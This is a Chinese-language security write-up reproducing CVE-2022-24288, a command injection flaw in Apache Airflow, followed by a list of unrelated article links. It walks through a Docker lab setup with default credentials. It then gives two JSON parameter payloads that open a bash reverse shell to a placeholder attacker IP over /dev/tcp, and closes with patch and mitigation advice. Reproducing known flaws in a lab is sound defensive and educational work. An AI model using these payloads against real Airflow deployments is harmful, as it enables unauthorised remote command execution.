CVE-2022-24288:Apache Airflow OS命令注入漏洞
0x01 简介Apache Airflow是美国阿帕奇(Apache)基金会的一套用于创建、管理和监控工作流程的开源平台。该平台具有可扩展和动态监控等特点。0x02 漏洞概述Apache Airflow 存在操作系统命令注入漏洞,该漏洞的存在是由于某些示例dag中不正确的输入验证。远程未经身份验证的攻击者可利用该漏洞可以传递专门制作的HTTP请求,并在目标
0x01 简介
Apache Airflow是美国阿帕奇(Apache)基金会的一套用于创建、管理和监控工作流程的开源平台。该平台具有可扩展和动态监控等特点。
0x02 漏洞概述
Apache Airflow 存在操作系统命令注入漏洞,该漏洞的存在是由于某些示例dag中不正确的输入验证。远程未经身份验证的攻击者可利用该漏洞可以传递专门制作的HTTP请求,并在目标系统上执行任意操作系统命令。该漏洞允许远程攻击者可利用该漏洞在目标系统上执行任意shell命令。
0x03 影响版本
Apache Airflow < 2.2.4
0x04 环境搭建
使用docker搭建存在漏洞的系统版本
获取yaml文档
curl -LfO 'https://airflow.apache.org/docs/apache-airflow/2.2.3/docker-compose.yaml'
vim docker-compose.yaml
把这两个参数改成下面的,选择postgres的latest版本,privileged=true就是提升权限
image: postgres:latest
privileged: true(没有就加一个)
然后wq保存
在这里你用docker-compose config -q会有一个警告的,为了不报这个警告官网也推荐了以下这个方式
mkdir -p ./dags ./logs ./plugins
echo -e "AIRFLOW_UID=$(id -u)" > .env
直接执行即可
初始化
docker-compose up airflow-init
docker-compose后台启动airflow
docker-compose -f docker-compose.yaml up -d
启动完成,浏览器打开ip:8080端口
用户名:airflow
密码:airflow
登陆,环境搭建完成
0x05 漏洞复现
参考漏洞提交者的文章
https://hackerone.com/reports/1492896
两处RCE均为后台漏洞(需要配合未授权或者默认口令漏洞进行利用)
第一处:
开启监听
反弹shell
{"foo":"\";bash -i >& /dev/tcp/xx.xx.xx.xx/8881 0>&1;\""}
反弹成功
第二处:
开启监听
{"my_param":"\";bash -i >& /dev/tcp/xx.xx.xx.xx/8881 0>&1;\""}
反弹成功
0x06 修复方式
1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
http://seclists.org/oss-sec/2022/q1/160
2、删除或禁用默认DAG(可自行删除或在配置文件中禁用默认DAGload_examples=False)
原文由:Timeline Sec
相关文章
- Apache配置详解(最好的APACHE配置教程)
- Apache配置虚拟主机_apache中配置虚拟主机的作用
- Apache配置虚拟主机_apache启动但是访问不到
- 简单讲讲python中的os模块
- Apache knox_apache发生服务特定错误1
- Mac OS装配开源爬虫框架pyspider
- 蛋疼的Mac OS虚拟机和xcode 4.2
- ORA-48197: OS command to get the file status failed ORACLE 报错 故障修复 远程处理
- ORA-09272: remote os logon is not allowed ORACLE 报错 故障修复 远程处理
- MySQL Status Innodb_os_log_pending_fsyncs 数据库状态作用意思及如何正确
- 之间的差异比较OS和Linux的区别(os和linux)
- python split(),os.path.split()和os.path.splitext()函数用法详解编程语言
- Python os.rename()函数:重命名文件或目录
- 结合开发,推动进步: Apache与MySQL的协作(apache和mysql)
- Linux 下 Apache 服务器安装指南(linux安装apache)
- 的结合Apache和MySQL的完美结合(apache与mysql)
- Mac OS 2017:开启新纪元(macos2017)
- OS X,iOS 与 Linux 的漏洞均多于 Windows
- Chrome OS现在能运行Android应用,无需移植
- OS X平台的Dylib劫持技术(下)
- 逆向基础 OS-specific (四)
- SQLSERVER等待事件统计信息:sys.dm_os_wait_stats
- 实现Linux搭建Apache服务器的简单指南(linux装apache)
- 系统Apple Phones Evolve with Linux OS(苹果手机linux)
- elementary OS 正在构建一个可以买应用的开源应用商店
- Peppermint OS
- 以Apache、MySQL和PHP组成的最强技术栈(apache mysql php)
- Linux下重启Apache简易指令.(linux重启apache命令)
- 以oracle OS命令控制你的系统(oracle os命令)
- elementary OS 6“Odin”发布,迄今为止最大的更新
- Apache配置详解(最好的APACHE配置教程)